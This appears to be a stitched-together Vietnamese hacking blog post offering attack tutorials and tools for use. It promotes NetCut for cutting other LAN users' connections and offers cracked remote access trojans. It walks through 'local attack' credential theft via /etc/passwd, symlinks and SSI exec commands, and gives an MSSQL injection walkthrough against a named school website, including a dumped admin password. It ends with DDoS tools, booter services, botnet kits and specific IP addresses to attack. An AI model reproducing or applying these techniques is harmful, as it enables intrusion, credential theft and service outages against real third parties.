on Thứ Tư, 8 tháng 4, 2015
Dùng chung hay chia sẻ cùng một mạng là hình thức được rất nhiều người chọn nhằm tiết kiệm chi phí. Tuy nhiên một tình huống rất hay gặp khi bạn chia sẻ đường truyền internet của mình là trong số người dùng thế nào cũng có một ông dùng rất trâu bò (download xxx chẳng hạn). Đương nhiên những người còn lại sẽ thấy rất tốc độ vào mạng rất chậm.
Nếu sự việc đó diễn ra chỉ trong thời gian ngắn thì còn chấp nhận được nhưng nếu nó cứ liên tục 24/7 thì quả là ức chế phải không? Khổ nỗi đường truyền internet là dùng chung nên bạn chẳng thể nào ngăn hắn làm việc đó được. Nếu nhắc nhở mãi mà hắn vẫn không thay đổi thì chả lẽ chỉ còn nước rút dây mạng của hắn ra? Như vậy thì cũng không hay lắm nhỉ.

Sau đây mình sẽ giới thiệu cho các bạn một cách nhẹ nhàng hơn thế nhiều.

NetCut là một phần mềm cổ (chắc một vài bạn cũng biết) có tác dụng giúp bạn quản trị các kết nối trong mạng thông qua giao thức ARP. Nó có thể liệt kê danh sách IP-MAC các thiết bị có trong mạng LAN của bạn kể cả các router hay switch. Và bạn có thể tắt hoặc bật kết nối của bất kì thiết bị nào. Nói đến đây chắc bạn cũng đã hiểu cách mình muốn giới thiệu là gì rồi phải không.

Sau khi tải về, bạn giải nén nó ra và chạy netcut.exe, đợi một lúc bạn sẽ thấy nó hiện lên danh sách IP-MAC của các máy trong mạng. Lúc này bạn chỉ cần chọn máy bạn muốn ngắt kết nối và click nút “Cut Off”. Vậy là xong, nạn nhân sẽ không thể truy cập vào internet cũng như truy cập vào các thư mục chia sẻ nữa
Download Netcut
AVG: CLEANAd-Aware: CLEANAhn Lab V3 Internet Security: CLEANArca Vir: CLEANAvast: CLEANAvira: CLEANBit Defender: CLEANBull Guard Internet Security: CLEANClamAV: CLEANComodo: CLEANDr. Web: CLEANEScan Internet Security Suite 14: CLEANEmisoft Anti-Malware (A-Squared): CLEANF-Secure: CLEANFortinet 5: CLEANFprot: CLEANGdata: CLEANIkarus: CLEANImmunet Antivirus: CLEANK7 Ultimate: CLEANKaspersky Internet Security 2014: CLEANMcafee: CLEANMicrosoft Security Essentials: CLEANNOD32: CLEANNano: CLEANNorman: CLEANNorton Internet Security: CLEANOutpost Security Suite Pro: CLEANPanda Antivirus: CLEANPanda Cloud: CLEANQuick Heal: CLEANSUPER Anti-Spyware: CLEANSophos: CLEANTotal Defense IS: CLEANTrend MicroCLEANTwister Antivirus 8: CLEANVBA: CLEANVipre Internet Security: CLEANVirit: CLEAN
Filename: Vietlq.jar
Detection Rate: 0/39
File MD5: cb49a3981c05d7af8a32bd1fc2305d74
ChangeLog 2.2.3
[F] – Fixed NPE on port check
[F] – Fixed Diskstore issue
[I] – Refined plugin market(still needs work)
[I] – Updated mobile plugin
[A] – Added framework for mainscreen client details
[F] – Fixed small input bugs
[I] – Improved generation reports
[I] – Unified Generators to one superclass
[A] – Added 2 more plugin fields
[I] – Decreased ram usage by small amount (Needs more improvement)

XENA RAT 2.0.0 CRACKED BY 0X22

UPDATE
  • No longer calling home
  • No longer using loader.
Instructions:
1. Start Xena Xena RAT – 2.0.0.exe
2. Enjoy.
Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ  bài 2 - Giới thiệu tính năng 1 số shell

      


  *        Nhắc lại trình tự các bước Local Attack

     1-       View danh sách các user trong server
     2-      Tìm  file config.php
     3-      Get thông tin login vào database
     4-      Crack hoặc change pass admin
     5-      Login vào quyên quản trị và upshell

    
     1-      View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó


-          Một số câu lệnh để get user:

Lệnh phổ biến nhất:
Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd
./cat/etc/passwd
More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:


Pass download: soleil_vhb
Pass dải nén: ceh.vn

 -          Câu lênh get user & domain

Cat /etc/virtual/domainowners  ( Chỉ dùng đối với direct admin )
               
      2-      Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

-          Vbulletin:
path/includes/config.php
-          Mybb:
path/inc/config.php
-          Joomla:
path/configuration.php
-          Word-Press:
path/wp-config.php
-          Ibp:
path/conf_global.php
-          Php-fusion:
path/config.php
-          Smf:
Path/Settings.php
-          Nuke:
path/config.php
-          Xoops:
path/mainfile.php
-          Zen Cart
Path/includes/configure.php
-          path/setidio:
path/datas/config.php
-          Datalife Engine:
path/engine/data/config.php
-          Phpbb:
Path/config.php
-          Wordpress:
path/wp-config.php
-          Seditio:
path/datas/config.php
-          Drupal:
path/sites/default/settings.php
                       -   Discuz
          path/config/config_ucenter.php
                       -  Bo-Blog
           path/data/config.php


-          Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).

-          Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:

Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php

( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” -  Đây là path mặc định dẫn tới file init.php))……


     3-      Get thông tin file config 

Phần này chính là phần trọng tâm nhất trong  bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.

3.1-  Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:

-          Ls , dir       : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục


-          Cat, ./cat, less, more, tail :  View nôi dung bên trong các file:
-          Ln : Lệnh symbolic link:
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini
-          Cd: Chuyển đổi thư mục

Ví dụ muốn chuyển tới thư mục soleil”
Cd /home/vhbgroup/public_html/@4rum/includes/soleil
cd ~ : Tới thư mục home dictionary
cd -:  Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc
-          Chmod: Phân quyền cho các file hoặc thư mục:
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )
-          Mkdir: tạo thư mục:

Ví du muốn tạo thư mục soleil trong thư mục includes:
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil 
-          Touch : Tạo file:

touch /home/vhbgroup/public_html/@4rum/includes/soleil.php 
-          Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)

Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)
Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)
…………

3.2- Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php


    1-      Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.

Ví dụ:
dir /home/vhbgroup/public_html/includes
cat /home/vhbgroup/public_html/includes/config.php

Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi

     2-      Sử dụng Symbolic link – Gọi tắt là symlink

Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini

Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path/home/vhbgroup/public_html/@4rum/includes/config.php
Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.



     3-      Sử dụng symlink kết hợp với ssi:

Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
-          Tạo 1 file ducdung08clc.shtml với nội dung như sau:

<!--#include virtual="soleil.ini"-->

Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.

     4-      Chạy lệnh bằng file .shtml

-          Tuy nhiên  có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml

<!--#exec cmd="cat /etc/passwd"-->

-          Lệnh xem file logs như sau:

<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->

Lưu ý:  + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
 +  /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
           + Còn path dẫn đến file error.log của cpanel là:  /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.



     5-      Get all config toàn server


       -          Đâu tiên download shell get all config ( w.php)  về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095  ( pass unlock: soleil_vhb )


KHAI THÁC WEB LỖI ASPX

------------------------------------TUT KHAI THAC SITE DẠNG ASPX--------------------------------
Cũng giông như các dạng khác ta thêm dấu "'" vào đít link hoặc vào thanh tìm kiếm cũa web site để biết site có lỗi hay không
----> victim cho các bạn test: thptnguyenthaibinh.edu.vn
~~~~~Làm từng bước theo tut nhé

++++Tim version: 'and 1=convert(int,(@@version))-- -


++++Tim database: 'and 1=convert(int,(db_name()))-- -


++++tim thong tin table:
'and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -         (1)


++++tim cac table khac table da tim dc o tren(1)
'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('các table t`im đc')))-- -


****tai sao phải them (((where table_name not in ))) ý nghĩa la tim các table khac ngoai cac  table da tim dc

----Tìm cho đến khi tìm đc cái table như: admin,user,....)thì dùng lại

@vd :'admin'
bay giờ tim ra admin r thi dừng lại (chưa t`im đc th`i cứ t`im ti^ếp)
----->tiếp theo ta:
++++Tìm thông tin table 'admin' vừa tìm đc

ta đang khai thác table 'admin'
nen dong lệnh sẽ thay đổi

'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin')))-- -

@ví dụ tim đc từ 'admin': là 'ID' thì:

----Ta làm tương tụ như ở trên
 'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin') and column_name not(khác) in ('ID')))-- - delete từ khác đi nhé

Ta khai thác đến khi naò tìm đc :
-ở đây thì mình khai thác đc là :username và password
?:roi lam sao co user va passÂ
TA dùng lệnh cụ thể trong table username và password

'and 1=convert(int,(select top 1 username from admin))-- - để biết tài khoản
'and 1=convert(int,(select top 1 password from admin))-- - để biết mật khẩu

username: 'admin'
password: 'bongbi0917343846'

                                                                  %%%%%TUT VIẾT BỚI MINH TRỰC ---GLOOMY HACKING TEAM (GHT)%%%%%%

DDOS Refref.pl

Share và giới thiệu tool #refref - Vũ khí tối thượng của Anonymous 2011
Kẻ nào thông minh sẽ biết cách sử dụng - Gợi ý : code chạy = perl
Anonymous nổi tiếng với những cuộc tấn công từ chối dịch vụ (DDoS) vào các hệ thống mạng, khiến hệ thống bị quá tải và ngưng hoạt động. Công cụ được nhóm hacker này sử dụng hiện nay có tên gọi Low Orbit Ion Cannon (LOIC), đã từng phát huy sức mạnh khi đánh sập không ít hệ thống lớn trên thế giới.
Tuy nhiên, điểm yếu của công cụ LOIC đó là chưa cung cấp chế độ bảo vệ đủ mạnh để che dấu thông tin của những hacker đứng đằng sau sự tấn công, đó là lý do khiến không ít hacker của Anonymous bị bắt giữ trong thời gian qua.
Để khắc phục điều này, Anonymous đã phát triển một “vũ khí” mới, mạnh mẽ hơn và hoàn hảo hơn cho công cuộc “tấn công”, với tên gọi RefRef. Ngay lập tức, Anonymous đã cho thử nghiệm vũ khí mới của mình. Điều đáng nói, “nạn nhân” được Anonymous đem ra thử nghiệm lại là trang web Pastebin, trang web thường được các hacker (bao gồm cả Anonymous) sử dụng để đăng tải các “chiến công” và các thông tin mà chúng đánh cắp được.
Anonymous chỉ thực hiện cuộc tấn công bằng RefRef trong 17 giây, nhưng đã khiến hệ thống của PasteBin bị ngưng trệ suốt 42 phút, chính PasteBin sau đó đã xác nhận điều này trên Twitter. Điều này cho thấy được sức mạnh đáng sợ của công cụ mới mà Anonymous vừa phát triển.
Được biết, công cụ RefRef được xây dựng JavaScript, có thể tấn công và khai thác lỗ hổng trên các máy chủ hỗ trợ JavaScript và SQL. RefRef sẽ sử dụng chính sức mạnh xử lý của mục tiêu để chống lại chính nó, khiến các máy chủ bị cạn kiện tài nguyên hệ thống và ngưng trệ do quá tải.
Điều đặc biệt đó là RefRef là 1 nền tảng độc lập và có thể sử dụng trên bất kỳ thiết bị nào hỗ trợ JavaScript, bao gồm cả điện thoại di động và các hệ thống máy chơi game. Điều này cho phép Anonymous huy động 1 “lực lượng” đông đảo các máy tính ma vào các cuộc tấn công từ chối dịch vụ, bất kể đó chỉ là 1 chiếc smartphone hay là máy chơi game có kết nối Internet.
Công cụ RefRef của Anonymous đã nhận được giải thưởng Pwnie, giải thưởng được xem như “giải Oscar” dành cho hacker được tổ chức tại hội nghị “Hacker mũ đen” vào ngày 3/8 vừa qua.
https://www.facebook.com/download/871074766285376/refref.pl

SHARE CÁC TOOLS DDOS MẠNH

-          Tool DDOS UDP ( Botnet shell )
   Vi deo hướng dẫn sử dụng:

   File để upload lên website tạo mạng Bot

   Đạn dược để Attack
Sử dụng file trên để upload lên các website rồi lấy đường link ( up lên các website hack được hoặc có thể  sử dụng các hosting free để tạo mạng bot)

-          Booters Stressers
Sử dụng CC để mua các tài khoản chuyên DDOS ở các trang nước ngoài. Có 2 trang Soleil thấy khá mạnh làhttp://www.ipstresser.com/index.php  http://www.buyddos.com/

-          DOS ProC5
Tool này sử dụng Proxy để Attack, gần tương tự như Web Hunter.

(Cái này Soleil cũng down trên mạng nên có thể có virus nhé )

-          Và rất nhiều tool khác nữa Soleil đã trải nghiệm qua và có thể dùng được như: HOIC, LOIC, http fucker, http flood, web hunter để đánh các site mức độ trung bình. Các tool này có thể tìm kiếm trên google từ tên của chúng.

-          Mạng Botnet.
Mạng botnet bằng các zoobie là máy tính, Với kinh nghiệm bản thân Soleil thấy dùng trên 2 mã nguồn này rất tốt và ổn định   http://betabot.ru/  http://andromedabot.info/  xây dựng cái này  phải đầu tư thời gian. Mạng botnet thì ko thể share ở đây được.

Sử dụng 3 ip để làm proxy
Addresses:  58.68.168.229
          58.68.168.250
          209.177.92.5
          58.68.168.249

DDOS các IP này Die thì website sẽ Die.

JSPY V0.33 CRACKED BY ANONYMOUS